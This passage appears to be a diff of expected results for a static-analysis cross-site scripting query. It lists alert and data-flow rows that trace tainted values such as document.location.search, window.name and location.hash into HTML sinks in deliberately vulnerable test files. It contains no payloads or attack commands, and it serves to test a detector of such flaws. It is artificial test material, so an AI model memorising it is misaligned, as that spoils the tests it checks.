chop(do ... search) | tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:46:21:46:44 | documen ... .search | user-provided value | +| tst.js:47:16:47:45 | chop(do ... search) | tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:47:21:47:44 | documen ... .search | user-provided value | +| tst.js:48:16:48:32 | wrap(chop(bar())) | tst.js:27:10:27:33 | documen ... .search | tst.js:48:16:48:32 | wrap(chop(bar())) | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:51:18:51:18 | s | tst.js:53:25:53:48 | documen ... .search | tst.js:51:18:51:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:53:25:53:48 | documen ... .search | user-provided value | +| tst.js:51:18:51:18 | s | tst.js:54:25:54:48 | documen ... .search | tst.js:51:18:51:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:54:25:54:48 | documen ... .search | user-provided value | +| tst.js:56:16:56:20 | bar() | tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:60:20:60:20 | x | tst.js:58:3:58:26 | documen ... .search | tst.js:60:20:60:20 | x | Cross-site scripting vulnerability due to $@. | tst.js:58:3:58:26 | documen ... .search | user-provided value | +| tst.js:63:49:63:72 | documen ... .search | tst.js:63:49:63:72 | documen ... .search | tst.js:63:49:63:72 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:63:49:63:72 | documen ... .search | user-provided value | +| tst.js:67:26:67:49 | documen ... .search | tst.js:67:26:67:49 | documen ... .search | tst.js:67:26:67:49 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:67:26:67:49 | documen ... .search | user-provided value | +| tst.js:68:25:68:48 | documen ... .search | tst.js:68:25:68:48 | documen ... .search | tst.js:68:25:68:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:68:25:68:48 | documen ... .search | user-provided value | +| tst.js:70:33:70:56 | documen ... .search | tst.js:70:33:70:56 | documen ... .search | tst.js:70:33:70:56 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:70:33:70:56 | documen ... .search | user-provided value | +| tst.js:71:32:71:55 | documen ... .search | tst.js:71:32:71:55 | documen ... .search | tst.js:71:32:71:55 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:71:32:71:55 | documen ... .search | user-provided value | +| tst.js:76:39:76:62 | documen ... .search | tst.js:76:39:76:62 | documen ... .search | tst.js:76:39:76:62 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:76:39:76:62 | documen ... .search | user-provided value | +| tst.js:82:30:82:53 | documen ... .search | tst.js:82:30:82:53 | documen ... .search | tst.js:82:30:82:53 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:82:30:82:53 | documen ... .search | user-provided value | +| tst.js:88:25:88:48 | documen ... .search | tst.js:88:25:88:48 | documen ... .search | tst.js:88:25:88:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:88:25:88:48 | documen ... .search | user-provided value | +| tst.js:95:18:95:18 | v | tst.js:93:11:93:34 | documen ... .search | tst.js:95:18:95:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:93:11:93:34 | documen ... .search | user-provided value | +| tst.js:120:18:120:18 | v | tst.js:93:11:93:34 | documen ... .search | tst.js:120:18:120:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:93:11:93:34 | documen ... .search | user-provided value | +| tst.js:135:49:135:49 | v | tst.js:132:29:132:50 | window. ... .search | tst.js:135:49:135:49 | v | Cross-site scripting vulnerability due to $@. | tst.js:132:29:132:50 | window. ... .search | user-provided value | +| tst.js:139:29:139:46 | xssSourceService() | tst.js:142:40:142:61 | window. ... .search | tst.js:139:29:139:46 | xssSourceService() | Cross-site scripting vulnerability due to $@. | tst.js:142:40:142:61 | window. ... .search | user-provided value | +| tst.js:164:28:164:33 | target | tst.js:161:18:161:41 | documen ... .search | tst.js:164:28:164:33 | target | Cross-site scripting vulnerability due to $@. | tst.js:161:18:161:41 | documen ... .search | user-provided value | +| tst.js:170:31:170:37 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:170:31:170:37 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:172:42:172:48 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:172:42:172:48 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:173:33:173:39 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:173:33:173:39 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:175:54:175:60 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:175:54:175:60 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:176:45:176:51 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:176:45:176:51 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:177:49:177:55 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:177:49:177:55 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:183:67:183:73 | tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:183:67:183:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:184:67:184:73 | tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:184:67:184:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:196:28:196:46 | this.state.tainted1 | tst.js:181:19:181:42 | documen ... .search | tst.js:196:28:196:46 | this.state.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:197:28:197:46 | this.state.tainted2 | tst.js:181:19:181:42 | documen ... .search | tst.js:197:28:197:46 | this.state.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:198:28:198:46 | this.state.tainted3 | tst.js:181:19:181:42 | documen ... .search | tst.js:198:28:198:46 | this.state.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:202:32:202:49 | prevState.tainted4 | tst.js:181:19:181:42 | documen ... .search | tst.js:202:32:202:49 | prevState.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:209:28:209:46 | this.props.tainted1 | tst.js:181:19:181:42 | documen ... .search | tst.js:209:28:209:46 | this.props.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:210:28:210:46 | this.props.tainted2 | tst.js:181:19:181:42 | documen ... .search | tst.js:210:28:210:46 | this.props.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:211:28:211:46 | this.props.tainted3 | tst.js:181:19:181:42 | documen ... .search | tst.js:211:28:211:46 | this.props.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:215:32:215:49 | prevProps.tainted4 | tst.js:181:19:181:42 | documen ... .search | tst.js:215:32:215:49 | prevProps.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:235:60:235:82 | this.st ... Tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:235:60:235:82 | this.st ... Tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:243:7:243:17 | window.name | tst.js:243:7:243:17 | window.name | tst.js:243:7:243:17 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:243:7:243:17 | window.name | user-provided value | +| tst.js:244:7:244:10 | name | tst.js:244:7:244:10 | name | tst.js:244:7:244:10 | name | Cross-site scripting vulnerability due to $@. | tst.js:244:7:244:10 | name | user-provided value | +| tst.js:248:11:248:21 | window.name | tst.js:248:11:248:21 | window.name | tst.js:248:11:248:21 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:248:11:248:21 | window.name | user-provided value | +| tst.js:264:22:264:29 | location | tst.js:264:22:264:29 | location | tst.js:264:22:264:29 | location | Cross-site scripting vulnerability due to $@. | tst.js:264:22:264:29 | location | user-provided value | +| tst.js:272:59:272:65 | tainted | tst.js:269:19:269:29 | window.name | tst.js:272:59:272:65 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:269:19:269:29 | window.name | user-provided value | +| tst.js:287:20:287:20 | e | tst.js:285:9:285:16 | location | tst.js:287:20:287:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:285:9:285:16 | location | user-provided value | +| tst.js:295:20:295:20 | e | tst.js:292:10:292:17 | location | tst.js:295:20:295:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:292:10:292:17 | location | user-provided value | +| tst.js:300:35:300:42 | location | tst.js:300:35:300:42 | location | tst.js:300:35:300:42 | location | Cross-site scripting vulnerability due to $@. | tst.js:300:35:300:42 | location | user-provided value | +| tst.js:316:18:316:35 | params.get('name') | tst.js:311:18:311:34 | document.location | tst.js:316:18:316:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:311:18:311:34 | document.location | user-provided value | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | tst.js:325:20:325:36 | document.location | tst.js:327:5:327:30 | getUrl( ... ring(1) | Cross-site scripting vulnerability due to $@. | tst.js:325:20:325:36 | document.location | user-provided value | +| tst.js:333:12:333:17 | target | tst.js:332:16:332:39 | documen ... .search | tst.js:333:12:333:17 | target | Cross-site scripting vulnerability due to $@. | tst.js:332:16:332:39 | documen ... .search | user-provided value | +| tst.js:340:16:340:21 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:340:16:340:21 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:344:21:344:26 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:344:21:344:26 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:347:18:347:23 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:347:18:347:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:357:18:357:23 | target | tst.js:355:16:355:39 | documen ... .search | tst.js:357:18:357:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:16:355:39 | documen ... .search | user-provided value | +| tst.js:367:18:367:23 | target | tst.js:364:16:364:39 | documen ... .search | tst.js:367:18:367:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:369:18:369:29 | target.taint | tst.js:364:16:364:39 | documen ... .search | tst.js:369:18:369:29 | target.taint | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:375:18:375:30 | target.taint3 | tst.js:374:19:374:42 | documen ... .search | tst.js:375:18:375:30 | target.taint3 | Cross-site scripting vulnerability due to $@. | tst.js:374:19:374:42 | documen ... .search | user-provided value | +| tst.js:380:18:380:30 | target.taint5 | tst.js:364:16:364:39 | documen ... .search | tst.js:380:18:380:30 | target.taint5 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:389:18:389:30 | target.taint7 | tst.js:364:16:364:39 | documen ... .search | tst.js:389:18:389:30 | target.taint7 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:392:18:392:30 | target.taint8 | tst.js:364:16:364:39 | documen ... .search | tst.js:392:18:392:30 | target.taint8 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:400:18:400:24 | payload | tst.js:399:17:399:36 | window.location.hash | tst.js:400:18:400:24 | payload | Cross-site scripting vulnerability due to $@. | tst.js:399:17:399:36 | window.location.hash | user-provided value | +| tst.js:404:20:404:27 | match[1] | tst.js:402:15:402:34 | window.location.hash | tst.js:404:20:404:27 | match[1] | Cross-site scripting vulnerability due to $@. | tst.js:402:15:402:34 | window.location.hash | user-provided value | +| tst.js:407:18:407:51 | window. ... '#')[1] | tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:51 | window. ... '#')[1] | Cross-site scripting vulnerability due to $@. | tst.js:407:18:407:37 | window.location.hash | user-provided value | +| tst.js:413:18:413:89 | target. ... data>') | tst.js:411:16:411:39 | documen ... .search | tst.js:413:18:413:89 | target. ... data>') | Cross-site scripting vulnerability due to $@. | tst.js:411:16:411:39 | documen ... .search | user-provided value | +| tst.js:423:28:423:33 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:423:28:423:33 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:424:33:424:38 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:424:33:424:38 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:425:34:425:39 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:425:34:425:39 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:426:41:426:46 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:426:41:426:46 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:427:44:427:49 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:427:44:427:49 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:428:32:428:37 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:428:32:428:37 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:438:18:438:23 | source | tst.js:436:16:436:39 | documen ... .search | tst.js:438:18:438:23 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:16:436:39 | documen ... .search | user-provided value | +| tst.js:439:18:439:42 | ansiToH ... source) | tst.js:436:16:436:39 | documen ... .search | tst.js:439:18:439:42 | ansiToH ... source) | Cross-site scripting vulnerability due to $@. | tst.js:436:16:436:39 | documen ... .search | user-provided value | +| tst.js:446:21:446:26 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:446:21:446:26 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:448:19:448:24 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:448:19:448:24 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:450:20:450:25 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:450:20:450:25 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:456:19:456:21 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:456:19:456:21 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:457:26:457:28 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:457:26:457:28 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:458:25:458:27 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:458:25:458:27 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:459:20:459:22 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:459:20:459:22 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:469:22:469:24 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:469:22:469:24 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:474:23:474:45 | locatio ... bstr(1) | tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:474:23:474:35 | location.hash | user-provided value | +| tst.js:477:18:477:40 | locatio ... bstr(1) | tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:477:18:477:30 | location.hash | user-provided value | +| tst.js:484:33:484:63 | decodeU ... n.hash) | tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | tst.js:484:43:484:62 | window.location.hash | user-provided value | +| tst.js:492:18:492:54 | target. ... "), '') | tst.js:491:16:491:39 | documen ... .search | tst.js:492:18:492:54 | target. ... "), '') | Cross-site scripting vulnerability due to $@. | tst.js:491:16:491:39 | documen ... .search | user-provided value | +| typeahead.js:25:18:25:20 | val | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:25:18:25:20 | val | Cross-site scripting vulnerability due to $@. | typeahead.js:20:22:20:45 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:9:4:9:34 | "
    " | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:9:4:9:34 | "
    " | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:10:4:10:27 | `
    ` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:10:4:10:27 | `
    ` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:11:4:11:44 | "
    ") | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:11:4:11:44 | "
    ") | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:12:4:12:41 | ["
    " | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | Config | -| tst.js:12:28:12:33 | target | tst.js:12:5:12:42 | '
    ' | provenance | Config | -| tst.js:17:7:17:56 | params | tst.js:18:18:18:23 | params | provenance | | -| tst.js:17:7:17:56 | params [MapValue] | tst.js:18:18:18:23 | params [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | tst.js:17:16:17:56 | (new UR ... hParams | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams | tst.js:17:7:17:56 | params | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | tst.js:17:7:17:56 | params [MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams] | provenance | | -| tst.js:18:18:18:23 | params | tst.js:18:18:18:35 | params.get('name') | provenance | Config | -| tst.js:18:18:18:23 | params [MapValue] | tst.js:18:18:18:35 | params.get('name') | provenance | | -| tst.js:20:7:20:61 | searchParams | tst.js:21:18:21:29 | searchParams | provenance | | -| tst.js:20:7:20:61 | searchParams [MapValue] | tst.js:21:18:21:29 | searchParams [MapValue] | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) | tst.js:20:7:20:61 | searchParams | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | tst.js:20:7:20:61 | searchParams [MapValue] | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:21:18:21:29 | searchParams | tst.js:21:18:21:41 | searchP ... 'name') | provenance | Config | -| tst.js:21:18:21:29 | searchParams [MapValue] | tst.js:21:18:21:41 | searchP ... 'name') | provenance | | -| tst.js:24:14:24:19 | target | tst.js:26:18:26:23 | target | provenance | | -| tst.js:28:5:28:28 | documen ... .search | tst.js:24:14:24:19 | target | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:58:26:58:30 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | provenance | | -| tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | Config | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | Config | -| tst.js:48:15:48:15 | s | tst.js:50:12:50:12 | s | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | Config | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | Config | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | Config | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | Config | -| tst.js:60:34:60:34 | s | tst.js:62:18:62:18 | s | provenance | | -| tst.js:64:25:64:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:65:25:65:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:70:1:70:27 | [,docum ... search] [1] | tst.js:70:46:70:46 | x | provenance | | -| tst.js:70:3:70:26 | documen ... .search | tst.js:70:1:70:27 | [,docum ... search] [1] | provenance | | -| tst.js:70:46:70:46 | x | tst.js:73:20:73:20 | x | provenance | | -| tst.js:107:7:107:44 | v | tst.js:110:18:110:18 | v | provenance | | -| tst.js:107:7:107:44 | v | tst.js:136:18:136:18 | v | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | Config | -| tst.js:107:11:107:44 | documen ... bstr(1) | tst.js:107:7:107:44 | v | provenance | | -| tst.js:148:29:148:50 | window. ... .search | tst.js:151:29:151:29 | v | provenance | | -| tst.js:151:29:151:29 | v | tst.js:151:49:151:49 | v | provenance | | -| tst.js:158:40:158:61 | window. ... .search | tst.js:155:29:155:46 | xssSourceService() | provenance | | -| tst.js:177:9:177:41 | target | tst.js:180:28:180:33 | target | provenance | | -| tst.js:177:18:177:41 | documen ... .search | tst.js:177:9:177:41 | target | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:186:31:186:37 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:188:42:188:48 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:189:33:189:39 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:191:54:191:60 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:192:45:192:51 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:193:49:193:55 | tainted | provenance | | -| tst.js:184:19:184:42 | documen ... .search | tst.js:184:9:184:42 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:199:67:199:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:197:19:197:42 | documen ... .search | tst.js:197:9:197:42 | tainted | provenance | | -| tst.js:199:67:199:73 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:204:35:204:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:206:46:206:52 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:207:38:207:44 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:208:35:208:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:204:35:204:41 | tainted | tst.js:212:28:212:46 | this.state.tainted1 | provenance | | -| tst.js:206:46:206:52 | tainted | tst.js:213:28:213:46 | this.state.tainted2 | provenance | | -| tst.js:207:38:207:44 | tainted | tst.js:214:28:214:46 | this.state.tainted3 | provenance | | -| tst.js:208:35:208:41 | tainted | tst.js:218:32:218:49 | prevState.tainted4 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:225:28:225:46 | this.props.tainted1 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:226:28:226:46 | this.props.tainted2 | provenance | | -| tst.js:238:20:238:26 | tainted | 